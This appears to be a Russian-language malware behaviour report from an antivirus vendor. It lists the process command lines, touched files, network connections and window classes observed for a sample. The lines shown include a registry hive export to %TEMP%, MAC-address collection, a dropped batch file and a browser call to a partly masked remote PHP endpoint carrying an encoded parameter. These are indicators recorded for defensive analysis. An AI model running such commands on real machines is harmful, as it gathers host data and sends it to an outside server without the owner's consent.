Техническая информация
Запускаемые процессы и их командные строки:
- '%ProgramFiles%\Internet Explorer\IEXPLORE.EXE' "http://ad#.##stentrega.com/ok.php?a=#########################################"
- '<SYSTEM32>\fsutil.exe' file createnew "%TEMP%\thum.db" 666"
- '<SYSTEM32>\reg.exe' export HKU %TEMP%\~x
- '<SYSTEM32>\find.exe' "Device"
- '<SYSTEM32>\cmd.exe' /c ""%APPDATA%\codigo.bat" > NUL"
- '<SYSTEM32>\cmd.exe' /c getmac | <SYSTEM32>\find.exe "Device"
- '<SYSTEM32>\getmac.exe'
Файлы, затрагиваемые в файловой системе:
- %TEMP%\~x
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\ok[1].php
- %APPDATA%\codigo.bat
Сетевая активность (соединения в формате узел:порт, HTTP-запросы, DNS-запросы):
- 'ad#.##stentrega.com':80
- 'localhost':1037
- http://ad#.##stentrega.com/ok.php?a=#######################################
- DNS ASK ad#.##stentrega.com
Окна (класс и заголовок):
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- ClassName: '' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''